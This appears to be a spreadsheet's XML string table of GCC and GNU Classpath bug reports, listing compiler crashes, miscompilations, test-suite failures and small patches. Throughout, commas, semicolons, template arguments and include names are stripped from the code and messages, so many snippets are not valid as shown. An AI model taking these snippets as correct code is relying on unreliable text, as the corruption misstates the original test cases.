  <si>
    <t>GCC-80583</t>
  </si>
  <si>
    <t>[6 Regression] ICE with target attribute and vectorized float: internal compiler error: in convert_move at expr.c:270</t>
  </si>
  <si>
    <t>The test case in attachment unfortunately is relatively large but I couldn't isolate the issue.
The main() of this source file is prepended with
    #ifdef __x86_64__
    __attribute__((target_clones(defaultavxavx2)))
    #endif
I use some operations on vector float types:
typedef float __attribute__((vector_size(32))) float8
typedef float __attribute__((vector_size(16))) float4
typedef float __attribute__((vector_size(8))) float2
The compiler appears to stumble on some arithmetic operations on these
Compile with g++ -std=c++1y -Wall -c -o main.o main.cpp. Error is:
In file included from /usr/include/c++/6.3.1/bits/stl_algo.h:61:0
                 from /usr/include/c++/6.3.1/algorithm:62
                 from main.cpp:4:
/usr/include/c++/6.3.1/bits/stl_heap.h: In function â€˜void std::__adjust_heap(_RandomAccessIterator _Distance _Distance _Tp _Compare) [with _RandomAccessIterator = armorset* _Distance = long int _Tp = armorset _Compare = __gnu_cxx::__ops::_Iter_less_iter]â€™:
/usr/include/c++/6.3.1/bits/stl_heap.h:209:5: note: The ABI for passing parameters with 32-byte alignment has changed in GCC 4.6
     __adjust_heap(_RandomAccessIterator __first _Distance __holeIndex
     ^~~~~~~~~~~~~
main.cpp: In function â€˜int main.avx.298(int char**)â€™:
main.cpp:477:85: internal compiler error: in convert_move at expr.c:270
    auto body_legs_abs = (body-&gt;absorptions.all - 100) * (legs-&gt;absorptions.all - 100)
                                                                                     ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccUaXkg3.out file please attach this to your bugreport.
[pisto@pisto ds3]$ g++  -std=c++1y -Wall -c -o main.o main.cpp
In file included from /usr/include/c++/6.3.1/bits/stl_algo.h:61:0
                 from /usr/include/c++/6.3.1/algorithm:62
                 from main.cpp:4:
/usr/include/c++/6.3.1/bits/stl_heap.h: In function â€˜void std::__adjust_heap(_RandomAccessIterator _Distance _Distance _Tp _Compare) [with _RandomAccessIterator = armorset* _Distance = long int _Tp = armorset _Compare = __gnu_cxx::__ops::_Iter_less_iter]â€™:
/usr/include/c++/6.3.1/bits/stl_heap.h:209:5: note: The ABI for passing parameters with 32-byte alignment has changed in GCC 4.6
     __adjust_heap(_RandomAccessIterator __first _Distance __holeIndex
     ^~~~~~~~~~~~~
main.cpp: In function â€˜int main.avx.0(int char**)â€™:
main.cpp:477:44: internal compiler error: in convert_move at expr.c:270
    auto body_legs_abs = (body-&gt;absorptions.all - 100) * (legs-&gt;absorptions.all - 100)
                          ~~~~~~~~~~~~~~~~~~^~~
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cc8Qjc34.out file please attach this to your bugreport.</t>
  </si>
  <si>
    <t>GCC-54763</t>
  </si>
  <si>
    <t>Crash with enable_if (instead of recursive template errors)</t>
  </si>
  <si>
    <t>Created attachment 28308
C++11 code which causes an internal compiler error
The attached minimised C++11 test case causes an internal compiler error. Clang instead gives an endless list of errors such as:
fatal error: recursive template instantiation
      exceeded maximum depth of 512
The code which is also shown below will run correctly if the enable_if is instead set to: std::enable_if0)&gt;::type.
#include 
template 
struct tint {}
double zod(tint) { return 3.142 }
template &lt;
  unsigned I
  typename = typename std::enable_if0)decltype(zod(tint()))&gt;::type
&gt;
decltype(zod(tint()))
zod(tint) {
  return zod(tint())
}
int main(int argc char *argv[])
{
  zod(tint())
  return 0
}</t>
  </si>
  <si>
    <t>pkeir</t>
  </si>
  <si>
    <t>GCC-39402</t>
  </si>
  <si>
    <t>gfortran 20090306: internal write of  0.0 with F0.3 gives  **</t>
  </si>
  <si>
    <t>REAL :: x
 CHARACTER(80) :: str
 x = 0.0
 write (str'(f0.3)') x
 print * str
 END  
gives
 **
Other reals ok.
Downloaded 32-bit gfortran from Equation.com today: 4.4-20090306. Running on Win64.</t>
  </si>
  <si>
    <t>davidgkinniburgh</t>
  </si>
  <si>
    <t>GCC-60209</t>
  </si>
  <si>
    <t>Declaration of user-defined literal operator cause error</t>
  </si>
  <si>
    <t>I think that the sample code below should be compiled successfully.
void operator   _x(unsigned long long)
According to C++11 standard 2.2[lex.phases] string literal concatenation occurs in compilation phase 6 and syntax analysis is performed in compilation phase 7.</t>
  </si>
  <si>
    <t>emsr</t>
  </si>
  <si>
    <t>GCC-17608</t>
  </si>
  <si>
    <t>[3.3.4/3.4/4.0 regression] -profile should prevent use of libgcc_s</t>
  </si>
  <si>
    <t>When linking with -profile then -lc_p is used instead of -lc and the former is 
only available as a static library.  Thus this should be treated like a static 
link and no shared libgcc should be linked in.  But when HAVE_LD_AS_NEEDED 
then -lgcc_s is also being linked in by default causing a shared link that 
uses both libc_p and libc and the resulting binary will crash.</t>
  </si>
  <si>
    <t>GCC-5904</t>
  </si>
  <si>
    <t>Maintainership of Ada front end</t>
  </si>
  <si>
    <t>Many Ada source files say: It [GNAT] is now maintained by Ada Core Technologies Inc (http://www.gnat.com).
As far as I know it is official FSF policy that maintainers are persons not companies.
Release:
3.1 20020308 (prerelease)</t>
  </si>
  <si>
    <t>fw</t>
  </si>
  <si>
    <t>GCC-63514</t>
  </si>
  <si>
    <t>functions containing volatile are considered pure</t>
  </si>
  <si>
    <t>The following testcase is miscompiled at -O1:
&gt; cat test.f90
MODULE M1
CONTAINS
  INTEGER FUNCTION F1()
    INTEGER VOLATILE :: i
    F1=i
  END FUNCTION
  INTEGER FUNCTION F2()
    F2=F1()+F1()
  END FUNCTION
END MODULE
&gt; gfortran -O1 -fdump-tree-optimized -fno-inline -c test.f90
 Function f2 (__m1_MOD_f2 funcdef_no=0 decl_uid=2355 cgraph_uid=0 symbol_order=0)
f2 ()
{
  integer(kind=4) __var_1
  integer(kind=4) __result_f2.0_3
  :
  __var_1_2 = f1 ()
  __result_f2.0_3 = __var_1_2 + __var_1_2
  return __result_f2.0_3
}
f1 should be called twice in this case as it returns the value of a volatile. I believe f1 is being considered as pure here which seems not correct. Actually it doesn't generate an error if I add 'PURE' to the function definition which I assume is not correct either.</t>
  </si>
  <si>
    <t>GCC-77596</t>
  </si>
  <si>
    <t>[F03] procedure pointer component with implicit interface can point to a function</t>
  </si>
  <si>
    <t>Hi
I guess that in an ideal world the compiler should generate code to cause a run-time error in a situation like in the following snippet:
!!*** CODE ***
module proctest
  implicit none
  type tf
     procedure() nopass pointer :: fp
  end type tf
contains
  function ff(x)
    integer intent(in) :: x
    integer :: ff
    print * 'aaaa'
  end function ff
  subroutine ass()
    type(tf) :: p
    p%fp=&gt;ff
    call p%fp(3)
  end subroutine ass
end module proctest
program xxx
  use proctest
  call ass()
end program xxx
!!*** END CODE ***
In subroutine 'ass' I am assigning a function to the procedure pointer. Next I am able to call the function pointer like a subroutine using 'call' statement  with no consequences.</t>
  </si>
  <si>
    <t>t.kondic</t>
  </si>
  <si>
    <t>GCC-81767</t>
  </si>
  <si>
    <t>Unused variable warning with structured binding</t>
  </si>
  <si>
    <t>The following code produces warning: unused variable 'ignore' [-Wunused-variable]:
int main() {    
    int m[2][2] = {{12} {3 4}}
    int sum = 0
    for (auto&amp; [ignore value] : m) {
        sum += value
    }
    return sum - 6
}
This is not good as multiple users would like to ignore part of the result and deal only with the other part.
Seems better to warn only if result of structured binding does not used at all:
for (auto&amp; [ignore value] : m) { // warning: structured binding result not used
    sum += 0
}
Otherwise emit no warning (just like clang does).</t>
  </si>
  <si>
    <t>antoshkka</t>
  </si>
  <si>
    <t>GCC-4622</t>
  </si>
  <si>
    <t>incorrect implementation of complex operator/=</t>
  </si>
  <si>
    <t>the implementation of the operator/= function for std template complex
is wrong - the sign is reversed on the imaginary part on line 240 of
libstdc++-v3/include/bits/std_complex.h
Release:
3.0.1
Environment:
System: IRIX64 origin 6.5 01101245 IP35
host: mips-sgi-irix6.5
build: mips-sgi-irix6.5
target: mips-sgi-irix6.5
configured with: ../gcc-3.0.1/configure --prefix=/acct/eem2314/local</t>
  </si>
  <si>
    <t>edward.e.meyer</t>
  </si>
  <si>
    <t>GCC-79770</t>
  </si>
  <si>
    <t>[CHKP] ICE in chkp_find_bounds_1 (chkp_find_bounds: Unexpected tree code vector_cst)</t>
  </si>
  <si>
    <t>We ICE on all active branches on:
$ gcc /home/marxin/Programming/gcc/gcc/testsuite/gcc.target/i386/pr79498.c -mmpx -fcheck-pointer-bounds -mabi=ms
/home/marxin/Programming/gcc/gcc/testsuite/gcc.target/i386/pr79498.c: In function â€˜barâ€™:
/home/marxin/Programming/gcc/gcc/testsuite/gcc.target/i386/pr79498.c:10:1: warning: AVX512F vector return without AVX512F enabled changes the ABI [-Wpsabi]
 {
 ^
/home/marxin/Programming/gcc/gcc/testsuite/gcc.target/i386/pr79498.c: In function â€˜foo.chkpâ€™:
/home/marxin/Programming/gcc/gcc/testsuite/gcc.target/i386/pr79498.c:20:1: internal compiler error: chkp_find_bounds: Unexpected tree code vector_cst
 }
 ^
0xe230e7 chkp_find_bounds_1
	../../gcc/tree-chkp.c:3681
0xe27a0f chkp_find_bounds
	../../gcc/tree-chkp.c:3702
0xe27a0f chkp_add_bounds_to_call_stmt
	../../gcc/tree-chkp.c:1899
0xe27a0f chkp_instrument_function
	../../gcc/tree-chkp.c:4286
0xe27a0f chkp_execute
	../../gcc/tree-chkp.c:4470
0xe27a0f execute
	../../gcc/tree-chkp.c:4529</t>
  </si>
  <si>
    <t>marxin</t>
  </si>
  <si>
    <t>GCC-59088</t>
  </si>
  <si>
    <t>-mtune=core-avx2 doesn't turn on SSE unaligned load/store</t>
  </si>
  <si>
    <t>For Haswell -mtune=core-avx2 should turn on unaligned load/store.</t>
  </si>
  <si>
    <t>GCC-36678</t>
  </si>
  <si>
    <t>GNAT from svn uses up infinite amount of memory on twisty generic+tagged testcase</t>
  </si>
  <si>
    <t>$ gcc -c p-c.adb
+===========================GNAT BUG DETECTED==============================+
| 4.4.0 20080630 (experimental) (x86_64-unknown-linux-gnu) Storage_Error heap exhausted|
| Error detected at p-c.adb:1:1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p-c.adb
p-c.ads
p.ads
f.ads
g.ads
compilation abandoned
$ gcc -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc.fsf.master/configure --prefix=/usr/local/gnat-fsf --enable-languages=adacc++ --disable-bootstrap --disable-multilib --enable-checking
Thread model: posix
gcc version 4.4.0 20080630 (experimental) (GCC)
gcc built from svn as of this morning.
-- chop here --
with G
generic
   type T is private
package F is
   type R () is tagged private
   function C return R
private
   package GI is new G (T)
   type R is new GI.R with null record
end
generic
  type T is private
package G is
   type R is tagged null record
   procedure P (X : R Y : T)
end
package P is end
with F
package P.C is
private
   type New_Integer is new Integer
   package FI is new F (New_Integer)
   type R is new FI.R with null record
   function C return R
end
package body P.C is end</t>
  </si>
  <si>
    <t>GCC-9006</t>
  </si>
  <si>
    <t>Regressions on arm-elf and arm-netbsdelf after 3.4-bib merger</t>
  </si>
  <si>
    <t>There are several new regressions in the testsuite after the
3.4-bib merge.  These appear to be mainly due to _Unwind_SjLj_RaiseException failing
Release:
unknown
Environment:
Any host arm-elf cross or arm-netbsdelf native
How-To-Repeat:
The following tests from the g++ testsuite are now failing
FAIL: g++.dg/opt/cleanup1.C execution test
FAIL: g++.jason/template24.C  Execution test
FAIL: g++.jason/thunk1.C  Execution test
FAIL: g++.jason/thunk2.C  Execution test
FAIL: g++.jason/thunk3.C  Execution test
FAIL: g++.law/arg8.C  Execution test
FAIL: g++.law/cvt2.C  Execution test
FAIL: g++.law/temps3.C  Execution test
FAIL: g++.law/temps5.C  Execution test
FAIL: g++.law/virtual3.C  Execution test
FAIL: g++.mike/eh2.C  Execution test
FAIL: g++.mike/net34.C  Execution test
FAIL: g++.mike/p2846.C  Execution test
FAIL: g++.mike/temp.C  Execution test
FAIL: g++.other/dtor10.C  Execution test
FAIL: g++.other/empty1.C  Execution test
FAIL: g++.other/inline8.C  Execution test
FAIL: g++.other/unchanging1.C  Execution test
FAIL: g++.robertl/eb115.C  Execution test
FAIL: g++.robertl/eb27.C  Execution test
FAIL: g++.robertl/eb77.C  Execution test
In addition the following tests from libstdc++-v3 are failing on arm-netbsdelf -- the reason would appear to be the same
FAIL: 21_strings/capacity.cc execution test
FAIL: 21_strings/ctor_copy_dtor.cc execution test
FAIL: 21_strings/inserters_extractors.cc execution test
FAIL: 21_strings/invariants.cc execution test
FAIL: 21_strings/nonmember.cc execution test
FAIL: 21_strings/operations.cc execution test
FAIL: 21_strings/replace.cc execution test
FAIL: 21_strings/substr.cc execution test
FAIL: 22_locale/codecvt_members_char_char.cc execution test
FAIL: 22_locale/ctor_copy_dtor.cc execution test
FAIL: 22_locale/ctype_to_char.cc execution test
FAIL: 22_locale/operators.cc execution test
FAIL: 22_locale/static_members.cc execution test
FAIL: 23_containers/adaptors.cc execution test
FAIL: 23_containers/bitset_ctor.cc execution test
FAIL: 23_containers/deque_ctor.cc execution test
FAIL: 23_containers/deque_operators.cc execution test
FAIL: 23_containers/list_capacity.cc execution test
FAIL: 23_containers/list_ctor.cc execution test
FAIL: 23_containers/list_modifiers.cc execution test
FAIL: 23_containers/list_operators.cc execution test
FAIL: 23_containers/map_insert.cc execution test
FAIL: 23_containers/map_operators.cc execution test
FAIL: 23_containers/multiset.cc execution test
FAIL: 24_iterators/insert_iterator.cc execution test
FAIL: 24_iterators/iterator.cc execution test
FAIL: 24_iterators/ostreambuf_iterator.cc execution test
FAIL: 24_iterators/reverse_iterator.cc execution test
FAIL: 25_algorithms/rotate.cc execution test
FAIL: 25_algorithms/unique.cc execution test
FAIL: 26_numerics/binary_closure.cc execution test
FAIL: 26_numerics/complex_inserters_extractors.cc execution test
FAIL: 26_numerics/slice_array_assignment.cc execution test
FAIL: 27_io/filebuf_virtuals.cc execution test
FAIL: 27_io/instantiations.cc execution test
FAIL: 27_io/ios_base_callbacks.cc execution test
FAIL: 27_io/ios_base_members_static.cc execution test
FAIL: 27_io/ios_ctor.cc execution test
FAIL: 27_io/ios_init.cc execution test
FAIL: 27_io/ios_manip_basefield.cc execution test
FAIL: 27_io/ios_manip_fmtflags.cc execution test
FAIL: 27_io/ios_members.cc execution test
FAIL: 27_io/iostream_members.cc execution test
FAIL: 27_io/istream_extractor_arith.cc execution test
FAIL: 27_io/istream_extractor_other.cc execution test
FAIL: 27_io/istream_seeks.cc execution test
FAIL: 27_io/istream_sentry.cc execution test
FAIL: 27_io/istream_unformatted.cc execution test
FAIL: 27_io/istringstream_members.cc execution test
FAIL: 27_io/ostream_inserter_arith.cc execution test
FAIL: 27_io/ostream_inserter_char.cc execution test
FAIL: 27_io/ostream_inserter_other.cc execution test
FAIL: 27_io/ostream_manip.cc execution test
FAIL: 27_io/ostream_unformatted.cc execution test
FAIL: 27_io/ostringstream_members.cc execution test
FAIL: 27_io/streambuf_members.cc execution test
FAIL: 27_io/stringbuf_members.cc execution test
FAIL: 27_io/stringbuf_virtuals.cc execution test
FAIL: 27_io/stringstream_members.cc execution test
FAIL: backward/strstream_members.cc execution test
FAIL: ext/hash_map.cc execution test</t>
  </si>
  <si>
    <t>GCC-49199</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: in vect_create_epilog_for_reduction at tree-vect-loop.c:3445 with -O -fno-tree-scev-cprop -ftree-vectorize -funswitch-loops</t>
  </si>
  <si>
    <t>Created attachment 24378
reduced testcase
Compiler output:
$ gcc -O -fno-tree-scev-cprop -ftree-vectorize -funswitch-loops testcase.c 
testcase.c: In function 'foo':
testcase.c:4:5: internal compiler error: vector VEC(treebase) index domain error in vect_create_epilog_for_reduction at tree-vect-loop.c:3445
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r174319 - crash
4.6 r173059 - OK</t>
  </si>
  <si>
    <t>irar</t>
  </si>
  <si>
    <t>GCC-23477</t>
  </si>
  <si>
    <t>[4.1 Regression] default-initializing array new expression uses makes stack usage go way up</t>
  </si>
  <si>
    <t>the program 
    int main() 
    { 
        new int[10000000]() 
    } 
generates a 40MB executable. it compiles into a memcpy() of 40MB of zeros into 
the newly-allocated array. 
tested at -O0 and -O3. 
gcc version 4.0.1 20050727 (Red Hat 4.0.1-5)</t>
  </si>
  <si>
    <t>avi</t>
  </si>
  <si>
    <t>GCC-69966</t>
  </si>
  <si>
    <t>libgo: Port syscall.SetsockoptUcred from golang</t>
  </si>
  <si>
    <t>Created attachment 37796
patch
Michael Vogt noticed a missing syscall in gccgo which is available in golang. Backport is attached.</t>
  </si>
  <si>
    <t>GCC-16864</t>
  </si>
  <si>
    <t>[4.0 Regression] Segmentation fault during tree tail call elimination</t>
  </si>
  <si>
    <t>The attached testcase causes a segmentation fault in tree tailcall elimination. 
It looks like it expects local1 (a static) to have a default_def which it 
doesn't</t>
  </si>
  <si>
    <t>dberlin</t>
  </si>
  <si>
    <t>GCC-1214</t>
  </si>
  <si>
    <t>Build fails on Alpha</t>
  </si>
  <si>
    <t xml:space="preserve">Responsible-Changed-From-To: apbianco-&gt;tromey
Responsible-Changed-Why: I usually handle config problems.
</t>
  </si>
  <si>
    <t>GCC-64896</t>
  </si>
  <si>
    <t>[4.9/5 Regression] ICE in get_address_mode at rtlanal.c:5442</t>
  </si>
  <si>
    <t>qtwebkit-5.4 fails to build:
 % g++ -c -w -O2 -std=c++0x -march=amdfam10 SVGAllInOne.ii
svg/SVGSVGElement.cpp: In member function â€˜WebCore::FloatRect WebCore::SVGSVGElement::viewport() constâ€™:
svg/SVGSVGElement.cpp:60:5443: internal compiler error: in get_address_mode at rtlanal.c:5442
0xc411f1 get_address_mode(rtx_def*)
        ../../gcc/gcc/rtlanal.c:5442
0x98fb82 adjust_address_1(rtx_def* machine_mode long int int int long)
        ../../gcc/gcc/emit-rtl.c:2227
0x9c600f store_field
        ../../gcc/gcc/expr.c:6715
0x9cbbc0 expand_assignment(tree_node* tree_node* bool)
        ../../gcc/gcc/expr.c:5000
0x8cda6e expand_gimple_stmt_1
        ../../gcc/gcc/cfgexpand.c:3385
0x8cda6e expand_gimple_stmt
        ../../gcc/gcc/cfgexpand.c:3481
0x8d4807 expand_gimple_basic_block
        ../../gcc/gcc/cfgexpand.c:5397
0x8d6027 execute
        ../../gcc/gcc/cfgexpand.c:6006
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Adding -fno-ipa-icf fixes the issue. The testcase is very large: ~10MB.
Reduced testcase should be ready tomorrow.</t>
  </si>
  <si>
    <t>CLASSPATH-26091</t>
  </si>
  <si>
    <t>GapContent problem</t>
  </si>
  <si>
    <t>With the testcase attached I get this exception:
javax.swing.text.BadLocationException: the where argument cannot be greater than the content length
   at javax.swing.text.GapContent.insertString (GapContent.java:316)
   at javax.swing.text.AbstractDocument.insertString (AbstractDocument.java:543)
   at StyledDocument2.insertString (StyledDocument2.java:59)
   at Test1.main (Test1.java:16)
This obviously should not happen.</t>
  </si>
  <si>
    <t>GCC-32674</t>
  </si>
  <si>
    <t>[4.1 regression] ICE in lvalue_p_1 initialising static variable inside template class</t>
  </si>
  <si>
    <t>The following code snippet (similiar to PR31992) triggers an ICE since 4.1.x onwards:
----------------------- snip -----------------------
class C
{
  static const int j = 3
}
template class A
{
    static const int i
}
template const int A::i(C::j)
----------------------- snip -----------------------
Error message:
bug.cc:11: internal compiler error: in lvalue_p_1 at cp/tree.c:148</t>
  </si>
  <si>
    <t>GCC-2053</t>
  </si>
  <si>
    <t>Static cast from parent to children is working but shouldn't</t>
  </si>
  <si>
    <t>The compiler is not preventing a cast from a parent pointer 
to a children pointer unless inheritance is virtual.
Release:
2.95.3 20010101
Environment:
Linux 2.4.0 i686
How-To-Repeat:
struct A {} struct B : A {}
A * p1 = new A
B * p2 = static_cast(p1)</t>
  </si>
  <si>
    <t>GCC-15057</t>
  </si>
  <si>
    <t>[3.4 Regression] Compiling of conditional value throw constructs cause a segmentation violation</t>
  </si>
  <si>
    <t>Hy there 
first of all the new gcc-3.4 is a real improvement. 
It is definitivly better the the gcc-3.3.1 is used before 
thanks for your work. 
OK here is the bug: The following throw construct cause 
a crash of g++ when compiling this (taken from TOra-Tool): 
	throw () ?  :   
A workaround for this is the follwing: 
static retType __eval(  ) 
{ 
	if  
		return  
	else 
		return  
} 
I had to do this in order to make the tool TOra to 
compile. 
Thanks</t>
  </si>
  <si>
    <t>christian.groove</t>
  </si>
  <si>
    <t>GCC-16473</t>
  </si>
  <si>
    <t>[3.4] ServerSocket accept() leaks file descriptors</t>
  </si>
  <si>
    <t>As reported by Eric Wong:
In version 3.4.0/1 ServerSocket.accept() creates a
new Socket() and then in the process invoke
Socket.getImpl() which goes something like this:
-----
SocketImpl getImpl() throws SocketException
    try
      {
        if (!implCreated)
          {
            impl.create(true)
            implCreated = true
          }
      }
    catch (IOException e)
      {
        throw new SocketException(e.getMessage())
      }
    return impl
-----
But create(true) alone will cause
natPlainSocketImplPosix.cc (depending on the platform)
to create a fresh yet never-been-used socket
descriptor. As a result lsof will show:
&gt;&gt; socktest 31812 root 8u  sock 00 1364355 can't
identify protocol
So each ServerSocket.accept() call will generate
additional descriptor until we get EMFILE error (Too
many open files).</t>
  </si>
  <si>
    <t>GCC-45841</t>
  </si>
  <si>
    <t>[4.6 Regression]: r164529 cris-elf libstdc++ 27_io/basic_filebuf/seekoff/char/2-io.cc</t>
  </si>
  <si>
    <t>With revision r164528 this test passed.
From revision r164529 and on this test has failed as follows:
Running /tmp/r164529/gcc/libstdc++-v3/testsuite/libstdc++-dg/conformance.exp ...
... (non-regressions elided)
FAIL: 27_io/basic_filebuf/seekoff/char/2-io.cc execution test
With the message in the logfile being:
assertion c1 == c3 failed: file /tmp/hpautotest-gcc1/gcc/libstdc++-v3/testsuite/27_io/basic_filebuf/seekoff/char/2-io.cc line 97 function: void test05()^M
program stopped with signal 6.^M
FAIL: 27_io/basic_filebuf/seekoff/char/2-io.cc execution test
Author of patch in suspect revision range CC:ed.
I can check a simulator trace if a code inspection doesn't ring you any bells.</t>
  </si>
  <si>
    <t>GCC-66546</t>
  </si>
  <si>
    <t>jit</t>
  </si>
  <si>
    <t>No way to disable check for unreachable blocks</t>
  </si>
  <si>
    <t>Currently libgccjit always issues a hard error about unconditional blocks.
Some interpreters (e.g. Lua) generate bytecode that may have unreachable instructions so it should make it easier for client code if they can have a way to turn off this check.
See https://gcc.gnu.org/ml/jit/2015-q2/msg00057.html</t>
  </si>
  <si>
    <t>dmalcolm</t>
  </si>
  <si>
    <t>GCC-41873</t>
  </si>
  <si>
    <t>[OOP] Bogus Error: ABSTRACT INTERFACE must not be referenced...</t>
  </si>
  <si>
    <t>Hi
the attached code compiles with ifort 11.1 and with nagfor 5.2
but is rejected with current gfortran:
gfcbug93.f90:47.12:
    print * ipmin% dot_g_g (gg)
            1
Error: ABSTRACT INTERFACE 'dot' must not be referenced at (1)
gfcbug93.f90:47.12:
    print * ipmin% dot_g_g (gg)
            1
Error: ABSTRACT INTERFACE 'dot' must not be referenced at (1)
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-80121</t>
  </si>
  <si>
    <t>Memory leak with derived-type intent(out) argument</t>
  </si>
  <si>
    <t>Created attachment 41006
Fortran code with memory leak when compiled with gfortran
I'm getting a memory leak when I compile and run the attached code with gfortran.
No such problem occurs when I use the Intel or Portland compilers.
&gt; gfortran -g -O0 -std=f2008 code.f90
&gt; valgrind --leak-check=yes ./a.out
...
==32283== HEAP SUMMARY:
==32283==     in use at exit: 8 bytes in 1 blocks
==32283==   total heap usage: 28 allocs 27 frees 13784 bytes allocated
==32283== 
==32283== 8 bytes in 1 blocks are definitely lost in loss record 1 of 1
==32283==    at 0x4C29160: malloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==32283==    by 0x400C66: __m1_MOD_s1 (code.f90:14)
==32283==    by 0x400E0F: __m1_MOD_s1 (code.f90:18)
==32283==    by 0x400F1F: MAIN__ (code.f90:26)
==32283==    by 0x400F56: main (code.f90:23)
==32283== 
==32283== LEAK SUMMARY:
==32283==    definitely lost: 8 bytes in 1 blocks
==32283==    indirectly lost: 0 bytes in 0 blocks
==32283==      possibly lost: 0 bytes in 0 blocks
==32283==    still reachable: 0 bytes in 0 blocks
==32283==         suppressed: 0 bytes in 0 blocks</t>
  </si>
  <si>
    <t>GCC-57643</t>
  </si>
  <si>
    <t>libitm</t>
  </si>
  <si>
    <t>libitm.c/reentrant.c hangs on POWER8 with HTM</t>
  </si>
  <si>
    <t>The libitm.c/reentrant.c test case hangs on POWER8 hardware with HTM.  The symptoms I'm seeing are my tbegin. instruction succeeds but we fail the test (meaning someone has the write lock) at beginend.cc:200:
    if (unlikely(serial_lock.is_write_locked()))
      htm_abort()
...so we abort the transaction.  The failure is not persistent so we do
not break out of the loop due to:
    if (!htm_abort_should_retry(ret))
      break
We then fall into the following code where we hang trying to get the
read lock:
    serial_lock.read_lock(tx)
If I hack the call to htm_abort_should_retry(ret) so that we break of of the loop and fallback to SW TM then the test case executes correctly.  Andreas Krebbel said this fails on S390 as well.  Andreas Kleen said this works on X86 with RTM.  It's unknown whether on X86 whether its hw txn fails or succeeds or whether if it does fail over to sw txn whether it skips the code we're hanging in.</t>
  </si>
  <si>
    <t>torvald</t>
  </si>
  <si>
    <t>GCC-11895</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] ICE in reshape_init on attribute(vector_size(16)) int</t>
  </si>
  <si>
    <t xml:space="preserve">	Compiling valid altivec code with the C++ compiler gives an ICE in reshape_init()
Environment:
System: Linux fred.ninemoons.com 2.4.20-19.9 #1 Tue Jul 15 17:03:30 EDT 2003 i686 athlon i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: powerpc-unknown-eabialtivec
configured with: /src/sourceware/gcc/gcc/configure -v --prefix=/usr/local/sourceware --target=powerpc-unknown-eabialtivec --enable-gdbtk --disable-multilib --with-gnu-as --with-gnu-ld --with-newlib --enable-languages=cc++
How-To-Repeat:
    Script started on Tue 12 Aug 2003 08:33:29 AM MST
    $ cat b.i
    __attribute__((vector_size(16))) int a1 = { 100 200 300 400 }
    $ ./cc1 b.i
    Execution times (seconds)
     TOTAL                 :   0.01             0.00             0.01
    $ cat b.s
    	.file	b.i
    	.globl a1
    	.section	.data
    	.align 4
    	.type	a1 @object
    	.size	a1 16
    a1:
    	.long	100
    	.long	200
    	.long	300
    	.long	400
    	.ident	GCC: (GNU) 3.4 20030812 (experimental)
    $ ./cc1plus b.i
    b.i:1: internal compiler error: in reshape_init at cp/decl.c:7613
    Please submit a full bug report
    with preprocessed source if appropriate.
    See  for instructions.
    $ exit
    Script done on Tue 12 Aug 2003 08:34:24 AM MST</t>
  </si>
  <si>
    <t>fnf</t>
  </si>
  <si>
    <t>GCC-40638</t>
  </si>
  <si>
    <t>RTE: Unit number in I/O statement too large -- fails with any low value</t>
  </si>
  <si>
    <t>I find this hard to believe but a g77 code that has been in use for years crashed at the first OPEN statement when compiled with gfortran 4.3.1. Attached 15 line  test program reproduces the effect stops at line 8 with the error message:
At line 8 of file testlun.f
Fortran runtime error: Unit number in I/O statement too large
but the unit number was set to 12. Investigation shows it can be set to any value even 1. 
I am guessing this is hardware-related. It is a new system--ASUS MB with Intel Core I7 CPU. Identical code runs fine with same gfortran installed on a system equipped with an earlier Intel chip.</t>
  </si>
  <si>
    <t>GCC-47851</t>
  </si>
  <si>
    <t>[4.6 Regression] [C++0x] Incorrect decltype result for conditional operator</t>
  </si>
  <si>
    <t>Created attachment 23436
Test case
Suppose we have a code
    struct Type {}
    typedef Type const ConstType
    struct ConvertibleToType {
        operator Type }
    }
Then expression `true ? ConvertibleToType() : ConstType()` has type `Type`.
But `decltype(true ? ConvertibleToType() : ConstType())` is `Type const`.
Note that in gcc 4.5 both the type of the expression and its `decltype` are `Type`.
(In clang TOT both are `Type const`.)</t>
  </si>
  <si>
    <t>mimomorin</t>
  </si>
  <si>
    <t>GCC-46411</t>
  </si>
  <si>
    <t>MOVE_ALLOC wrongly rejected as impure</t>
  </si>
  <si>
    <t>Reported in #gfortran's IRC channel.
MOVE_ALLOC is pure but rejected in PURE programs:
13.7.118 MOVE_ALLOC (FROM TO)
Class. Pure subroutine.
  call move_alloc(ab)
       1
Error: Subroutine call to 'move_alloc' at (1) is not PURE
pure subroutine test()
  integer allocatable :: a b
  allocate(ab)
  call move_alloc(ab)
end subroutine test
Untested patch.
Actually I am not sure that CLASS_INQUIRY and  CLASS_TRANSFORMATIONAL functions are PURE. Currently all functions which are not IMPURE are marked as PURE.
diff --git a/gcc/fortran/intrinsic.c b/gcc/fortran/intrinsic.c
index f7f0e05..d17544c 100644
--- a/gcc/fortran/intrinsic.c
+++ b/gcc/fortran/intrinsic.c
@@ -41937 +41937 @@ gfc_intrinsic_sub_interface (gfc_code *c int error_flag)
       c-&gt;resolved_sym-&gt;attr.elemental = isym-&gt;elemental
     }
-  if (gfc_pure (NULL) &amp;&amp; !isym-&gt;elemental)
+  if (gfc_pure (NULL) &amp;&amp; !isym-&gt;pure)
     {
       gfc_error (Subroutine call to intrinsic '%s' at %L is not PURE name
diff --git a/gcc/fortran/intrinsic.texi b/gcc/fortran/intrinsic.texi
index 09f5278..3b81c2d 100644
--- a/gcc/fortran/intrinsic.texi
+++ b/gcc/fortran/intrinsic.texi
@@ -89777 +89777 @@ end program
 Fortran 2003 and later
 @item @emph{Class}:
-Subroutine
+Pure subroutine
 @item @emph{Syntax}:
 @code{CALL MOVE_ALLOC(FROM TO)}</t>
  </si>
  <si>
    <t>GCC-48979</t>
  </si>
  <si>
    <t>FRACTION und EXPONENT return invalid results for infinity/NaN</t>
  </si>
  <si>
    <t>program test_fractnan
    real parameter :: pinfp = transfer(z'7F800000' 0.0)
    real parameter :: ninfp = transfer(z'FF800000' 0.0)
